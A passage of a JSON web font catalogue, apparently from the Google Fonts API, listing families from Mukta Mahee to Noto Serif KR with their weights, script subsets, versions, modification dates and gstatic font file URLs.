        "200": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9MFcBoHJndqZCsW.ttf",
        "300": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9NhcxoHJndqZCsW.ttf",
        "regular": "http://fonts.gstatic.com/s/muktamahee/v7/XRXQ3IOIi0hcP8iVU67hA-vNWz4PDWtj.ttf",
        "500": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9M5choHJndqZCsW.ttf",
        "600": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9MVdRoHJndqZCsW.ttf",
        "700": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9NxdBoHJndqZCsW.ttf",
        "800": "http://fonts.gstatic.com/s/muktamahee/v7/XRXN3IOIi0hcP8iVU67hA9NtdxoHJndqZCsW.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mukta Malar",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "tamil"
      ],
      "version": "v7",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqIMwBtAB62ruoAZW.ttf",
        "300": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqINUBdAB62ruoAZW.ttf",
        "regular": "http://fonts.gstatic.com/s/muktamalar/v7/MCoXzAXyz8LOE2FpJMxZqLv4LfQJwHbn.ttf",
        "500": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqIMMBNAB62ruoAZW.ttf",
        "600": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqIMgA9AB62ruoAZW.ttf",
        "700": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqINEAtAB62ruoAZW.ttf",
        "800": "http://fonts.gstatic.com/s/muktamalar/v7/MCoKzAXyz8LOE2FpJMxZqINYAdAB62ruoAZW.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mukta Vaani",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "gujarati",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2019-07-16",
      "files": {
        "200": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGXNV8BD-u97MW1a.ttf",
        "300": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGWpVMBD-u97MW1a.ttf",
        "regular": "http://fonts.gstatic.com/s/muktavaani/v7/3Jn5SD_-ynaxmxnEfVHPIF0FfORL0fNy.ttf",
        "500": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGXxVcBD-u97MW1a.ttf",
        "600": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGXdUsBD-u97MW1a.ttf",
        "700": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGW5U8BD-u97MW1a.ttf",
        "800": "http://fonts.gstatic.com/s/muktavaani/v7/3JnkSD_-ynaxmxnEfVHPIGWlUMBD-u97MW1a.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mulish",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-07-13",
      "files": {
        "200": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNRwaClGrw-PTY.ttf",
        "300": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexc1RwaClGrw-PTY.ttf",
        "regular": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNRwaClGrw-PTY.ttf",
        "500": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexaFRwaClGrw-PTY.ttf",
        "600": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexU1WwaClGrw-PTY.ttf",
        "700": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexXRWwaClGrw-PTY.ttf",
        "800": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexRNWwaClGrw-PTY.ttf",
        "900": "http://fonts.gstatic.com/s/mulish/v1/1Ptyg83HX_SGhgqO0yLcmjzUAuWexTpWwaClGrw-PTY.ttf",
        "200italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeOvHp47LTZFwA.ttf",
        "300italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSd-OvHp47LTZFwA.ttf",
        "italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSKeOvHp47LTZFwA.ttf",
        "500italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSG-OvHp47LTZFwA.ttf",
        "600italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsS9-SvHp47LTZFwA.ttf",
        "700italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSzuSvHp47LTZFwA.ttf",
        "800italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSqeSvHp47LTZFwA.ttf",
        "900italic": "http://fonts.gstatic.com/s/mulish/v1/1Ptwg83HX_SGhgqk2hAjQlW_mEuZ0FsSgOSvHp47LTZFwA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "MuseoModerno",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZFuewajeKlCdo.ttf",
        "200": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZEuewajeKlCdo.ttf",
        "300": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMghEuewajeKlCdo.ttf",
        "regular": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMlZEuewajeKlCdo.ttf",
        "500": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMmREuewajeKlCdo.ttf",
        "600": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMohDuewajeKlCdo.ttf",
        "700": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMrFDuewajeKlCdo.ttf",
        "800": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMtZDuewajeKlCdo.ttf",
        "900": "http://fonts.gstatic.com/s/museomoderno/v2/zrf30HnU0_7wWdMrFcWqSEXPVyEaWJ55pTleMv9DuewajeKlCdo.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Mystery Quest",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/mysteryquest/v8/-nF6OG414u0E6k0wynSGlujRHwElD_9Qz9E.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "NTR",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ntr/v9/RLpzK5Xy0ZjiGGhs5TA4bg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nanum Brush Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v17",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nanumbrushscript/v17/wXK2E2wfpokopxzthSqPbcR5_gVaxazyjqBr1lO97Q.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nanum Gothic",
      "variants": [
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v17",
      "lastModified": "2019-07-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nanumgothic/v17/PN_3Rfi-oW3hYwmKDpxS7F_z_tLfxno73g.ttf",
        "700": "http://fonts.gstatic.com/s/nanumgothic/v17/PN_oRfi-oW3hYwmKDpxS7F_LQv37zlEn14YEUQ.ttf",
        "800": "http://fonts.gstatic.com/s/nanumgothic/v17/PN_oRfi-oW3hYwmKDpxS7F_LXv77zlEn14YEUQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nanum Gothic Coding",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v14",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nanumgothiccoding/v14/8QIVdjzHisX_8vv59_xMxtPFW4IXROwsy6QxVs1X7tc.ttf",
        "700": "http://fonts.gstatic.com/s/nanumgothiccoding/v14/8QIYdjzHisX_8vv59_xMxtPFW4IXROws8xgecsV88t5V9r4.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nanum Myeongjo",
      "variants": [
        "regular",
        "700",
        "800"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v15",
      "lastModified": "2019-07-17",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nanummyeongjo/v15/9Btx3DZF0dXLMZlywRbVRNhxy1LreHQ8juyl.ttf",
        "700": "http://fonts.gstatic.com/s/nanummyeongjo/v15/9Bty3DZF0dXLMZlywRbVRNhxy2pXV1A0pfCs5Kos.ttf",
        "800": "http://fonts.gstatic.com/s/nanummyeongjo/v15/9Bty3DZF0dXLMZlywRbVRNhxy2pLVFA0pfCs5Kos.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nanum Pen Script",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v15",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nanumpenscript/v15/daaDSSYiLGqEal3MvdA_FOL_3FkN2z7-aMFCcTU.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Neucha",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/neucha/v12/q5uGsou0JOdh94bvugNsCxVEgA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Neuton",
      "variants": [
        "200",
        "300",
        "regular",
        "italic",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/neuton/v13/UMBQrPtMoH62xUZKAKkfegD5Drog6Q.ttf",
        "300": "http://fonts.gstatic.com/s/neuton/v13/UMBQrPtMoH62xUZKZKofegD5Drog6Q.ttf",
        "regular": "http://fonts.gstatic.com/s/neuton/v13/UMBTrPtMoH62xUZyyII7civlBw.ttf",
        "italic": "http://fonts.gstatic.com/s/neuton/v13/UMBRrPtMoH62xUZCyog_UC71B6M5.ttf",
        "700": "http://fonts.gstatic.com/s/neuton/v13/UMBQrPtMoH62xUZKdK0fegD5Drog6Q.ttf",
        "800": "http://fonts.gstatic.com/s/neuton/v13/UMBQrPtMoH62xUZKaK4fegD5Drog6Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "New Rocker",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/newrocker/v9/MwQzbhjp3-HImzcCU_cJkGMViblPtXs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "News Cycle",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v17",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/newscycle/v17/CSR64z1Qlv-GDxkbKVQ_TOcATNt_pOU.ttf",
        "700": "http://fonts.gstatic.com/s/newscycle/v17/CSR54z1Qlv-GDxkbKVQ_dFsvaNNUuOwkC2s.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Niconne",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/niconne/v10/w8gaH2QvRug1_rTfrQut2F4OuOo.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Niramit",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "200": "http://fonts.gstatic.com/s/niramit/v5/I_urMpWdvgLdNxVLVXx7tiiEr5_BdZ8.ttf",
        "200italic": "http://fonts.gstatic.com/s/niramit/v5/I_upMpWdvgLdNxVLXbZiXimOq73EZZ_f6w.ttf",
        "300": "http://fonts.gstatic.com/s/niramit/v5/I_urMpWdvgLdNxVLVRh4tiiEr5_BdZ8.ttf",
        "300italic": "http://fonts.gstatic.com/s/niramit/v5/I_upMpWdvgLdNxVLXbZiOiqOq73EZZ_f6w.ttf",
        "regular": "http://fonts.gstatic.com/s/niramit/v5/I_uuMpWdvgLdNxVLbbRQkiCvs5Y.ttf",
        "italic": "http://fonts.gstatic.com/s/niramit/v5/I_usMpWdvgLdNxVLXbZalgKqo5bYbA.ttf",
        "500": "http://fonts.gstatic.com/s/niramit/v5/I_urMpWdvgLdNxVLVUB5tiiEr5_BdZ8.ttf",
        "500italic": "http://fonts.gstatic.com/s/niramit/v5/I_upMpWdvgLdNxVLXbZiYiuOq73EZZ_f6w.ttf",
        "600": "http://fonts.gstatic.com/s/niramit/v5/I_urMpWdvgLdNxVLVWx-tiiEr5_BdZ8.ttf",
        "600italic": "http://fonts.gstatic.com/s/niramit/v5/I_upMpWdvgLdNxVLXbZiTiyOq73EZZ_f6w.ttf",
        "700": "http://fonts.gstatic.com/s/niramit/v5/I_urMpWdvgLdNxVLVQh_tiiEr5_BdZ8.ttf",
        "700italic": "http://fonts.gstatic.com/s/niramit/v5/I_upMpWdvgLdNxVLXbZiKi2Oq73EZZ_f6w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nixie One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nixieone/v11/lW-8wjkKLXjg5y2o2uUoUOFzpS-yLw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nobile",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nobile/v12/m8JTjflSeaOVl1i2XqfXeLVdbw.ttf",
        "italic": "http://fonts.gstatic.com/s/nobile/v12/m8JRjflSeaOVl1iGXK3TWrBNb3OD.ttf",
        "500": "http://fonts.gstatic.com/s/nobile/v12/m8JQjflSeaOVl1iOqo7zcJ5BZmqa3A.ttf",
        "500italic": "http://fonts.gstatic.com/s/nobile/v12/m8JWjflSeaOVl1iGXJUnc5RFRG-K3Mud.ttf",
        "700": "http://fonts.gstatic.com/s/nobile/v12/m8JQjflSeaOVl1iO4ojzcJ5BZmqa3A.ttf",
        "700italic": "http://fonts.gstatic.com/s/nobile/v12/m8JWjflSeaOVl1iGXJVvdZRFRG-K3Mud.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nokora",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nokora/v14/hYkIPuwgTubzaWxQOzoPovZg8Q.ttf",
        "700": "http://fonts.gstatic.com/s/nokora/v14/hYkLPuwgTubzaWxohxUrqt18-B9Uuw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Norican",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/norican/v9/MwQ2bhXp1eSBqjkPGJJRtGs-lbA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nosifer",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nosifer/v9/ZGjXol5JTp0g5bxZaC1RVDNdGDs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Notable",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v6",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/notable/v6/gNMEW3N_SIqx-WX9-HMoFIez5MI.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Nothing You Could Do",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/nothingyoucoulddo/v10/oY1B8fbBpaP5OX3DtrRYf_Q2BPB1SnfZb0OJl1ol2Ymo.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noticia Text",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/noticiatext/v10/VuJ2dNDF2Yv9qppOePKYRP1GYTFZt0rNpQ.ttf",
        "italic": "http://fonts.gstatic.com/s/noticiatext/v10/VuJodNDF2Yv9qppOePKYRP12YztdlU_dpSjt.ttf",
        "700": "http://fonts.gstatic.com/s/noticiatext/v10/VuJpdNDF2Yv9qppOePKYRP1-3R59v2HRrDH0eA.ttf",
        "700italic": "http://fonts.gstatic.com/s/noticiatext/v10/VuJrdNDF2Yv9qppOePKYRP12YwPhumvVjjTkeMnz.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "devanagari",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v11",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/notosans/v11/o-0IIpQlx3QUlC5A4PNb4j5Ba_2c7A.ttf",
        "italic": "http://fonts.gstatic.com/s/notosans/v11/o-0OIpQlx3QUlC5A4PNr4DRFSfiM7HBj.ttf",
        "700": "http://fonts.gstatic.com/s/notosans/v11/o-0NIpQlx3QUlC5A4PNjXhFlY9aA5Wl6PQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/notosans/v11/o-0TIpQlx3QUlC5A4PNr4Az5ZtyEx2xqPaif.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans HK",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "chinese-hongkong",
        "latin"
      ],
      "version": "v6",
      "lastModified": "2020-11-12",
      "files": {
        "100": "http://fonts.gstatic.com/s/notosanshk/v6/nKKO-GM_FYFRJvXzVXaAPe9ZUHp1MOv2ObB7.otf",
        "300": "http://fonts.gstatic.com/s/notosanshk/v6/nKKP-GM_FYFRJvXzVXaAPe9ZmFhTHMX6MKliqQ.otf",
        "regular": "http://fonts.gstatic.com/s/notosanshk/v6/nKKQ-GM_FYFRJvXzVXaAPe9hMnB3Eu7mOQ.otf",
        "500": "http://fonts.gstatic.com/s/notosanshk/v6/nKKP-GM_FYFRJvXzVXaAPe9ZwFlTHMX6MKliqQ.otf",
        "700": "http://fonts.gstatic.com/s/notosanshk/v6/nKKP-GM_FYFRJvXzVXaAPe9ZiF9THMX6MKliqQ.otf",
        "900": "http://fonts.gstatic.com/s/notosanshk/v6/nKKP-GM_FYFRJvXzVXaAPe9ZsF1THMX6MKliqQ.otf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans JP",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "japanese",
        "latin"
      ],
      "version": "v28",
      "lastModified": "2020-11-12",
      "files": {
        "100": "http://fonts.gstatic.com/s/notosansjp/v28/-F6ofjtqLzI2JPCgQBnw7HFQoggM-FNthvIU.otf",
        "300": "http://fonts.gstatic.com/s/notosansjp/v28/-F6pfjtqLzI2JPCgQBnw7HFQaioq1H1hj-sNFQ.otf",
        "regular": "http://fonts.gstatic.com/s/notosansjp/v28/-F62fjtqLzI2JPCgQBnw7HFowAIO2lZ9hg.otf",
        "500": "http://fonts.gstatic.com/s/notosansjp/v28/-F6pfjtqLzI2JPCgQBnw7HFQMisq1H1hj-sNFQ.otf",
        "700": "http://fonts.gstatic.com/s/notosansjp/v28/-F6pfjtqLzI2JPCgQBnw7HFQei0q1H1hj-sNFQ.otf",
        "900": "http://fonts.gstatic.com/s/notosansjp/v28/-F6pfjtqLzI2JPCgQBnw7HFQQi8q1H1hj-sNFQ.otf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans KR",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-11-12",
      "files": {
        "100": "http://fonts.gstatic.com/s/notosanskr/v13/Pby6FmXiEBPT4ITbgNA5CgmOsn7uwpYcuH8y.otf",
        "300": "http://fonts.gstatic.com/s/notosanskr/v13/Pby7FmXiEBPT4ITbgNA5CgmOelzI7rgQsWYrzw.otf",
        "regular": "http://fonts.gstatic.com/s/notosanskr/v13/PbykFmXiEBPT4ITbgNA5Cgm20HTs4JMMuA.otf",
        "500": "http://fonts.gstatic.com/s/notosanskr/v13/Pby7FmXiEBPT4ITbgNA5CgmOIl3I7rgQsWYrzw.otf",
        "700": "http://fonts.gstatic.com/s/notosanskr/v13/Pby7FmXiEBPT4ITbgNA5CgmOalvI7rgQsWYrzw.otf",
        "900": "http://fonts.gstatic.com/s/notosanskr/v13/Pby7FmXiEBPT4ITbgNA5CgmOUlnI7rgQsWYrzw.otf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans SC",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-11-12",
      "files": {
        "100": "http://fonts.gstatic.com/s/notosanssc/v12/k3kJo84MPvpLmixcA63oeALZTYKL2wv287Sb.otf",
        "300": "http://fonts.gstatic.com/s/notosanssc/v12/k3kIo84MPvpLmixcA63oeALZhaCt9yX6-q2CGg.otf",
        "regular": "http://fonts.gstatic.com/s/notosanssc/v12/k3kXo84MPvpLmixcA63oeALhL4iJ-Q7m8w.otf",
        "500": "http://fonts.gstatic.com/s/notosanssc/v12/k3kIo84MPvpLmixcA63oeALZ3aGt9yX6-q2CGg.otf",
        "700": "http://fonts.gstatic.com/s/notosanssc/v12/k3kIo84MPvpLmixcA63oeALZlaet9yX6-q2CGg.otf",
        "900": "http://fonts.gstatic.com/s/notosanssc/v12/k3kIo84MPvpLmixcA63oeALZraWt9yX6-q2CGg.otf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Sans TC",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "chinese-traditional",
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-11-12",
      "files": {
        "100": "http://fonts.gstatic.com/s/notosanstc/v11/-nFlOG829Oofr2wohFbTp9i9WyEJIfNZ1sjy.otf",
        "300": "http://fonts.gstatic.com/s/notosanstc/v11/-nFkOG829Oofr2wohFbTp9i9kwMvDd1V39Hr7g.otf",
        "regular": "http://fonts.gstatic.com/s/notosanstc/v11/-nF7OG829Oofr2wohFbTp9iFOSsLA_ZJ1g.otf",
        "500": "http://fonts.gstatic.com/s/notosanstc/v11/-nFkOG829Oofr2wohFbTp9i9ywIvDd1V39Hr7g.otf",
        "700": "http://fonts.gstatic.com/s/notosanstc/v11/-nFkOG829Oofr2wohFbTp9i9gwQvDd1V39Hr7g.otf",
        "900": "http://fonts.gstatic.com/s/notosanstc/v11/-nFkOG829Oofr2wohFbTp9i9uwYvDd1V39Hr7g.otf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Serif",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v9",
      "lastModified": "2020-09-10",
      "files": {
        "regular": "http://fonts.gstatic.com/s/notoserif/v9/ga6Iaw1J5X9T9RW6j9bNTFAcaRi_bMQ.ttf",
        "italic": "http://fonts.gstatic.com/s/notoserif/v9/ga6Kaw1J5X9T9RW6j9bNfFIWbTq6fMRRMw.ttf",
        "700": "http://fonts.gstatic.com/s/notoserif/v9/ga6Law1J5X9T9RW6j9bNdOwzTRCUcM1IKoY.ttf",
        "700italic": "http://fonts.gstatic.com/s/notoserif/v9/ga6Vaw1J5X9T9RW6j9bNfFIu0RWedO9NOoYIDg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Serif JP",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "japanese",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-11-12",
      "files": {
        "200": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZBaPRkgfU8fEwb0.otf",
        "300": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZHKMRkgfU8fEwb0.otf",
        "regular": "http://fonts.gstatic.com/s/notoserifjp/v8/xn7mYHs72GKoTvER4Gn3b5eMXNikYkY0T84.otf",
        "500": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZCqNRkgfU8fEwb0.otf",
        "600": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZAaKRkgfU8fEwb0.otf",
        "700": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZGKLRkgfU8fEwb0.otf",
        "900": "http://fonts.gstatic.com/s/notoserifjp/v8/xn77YHs72GKoTvER4Gn3b5eMZFqJRkgfU8fEwb0.otf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Noto Serif KR",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "900"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v7",
      "lastModified": "2020-11-12",
      "files": {
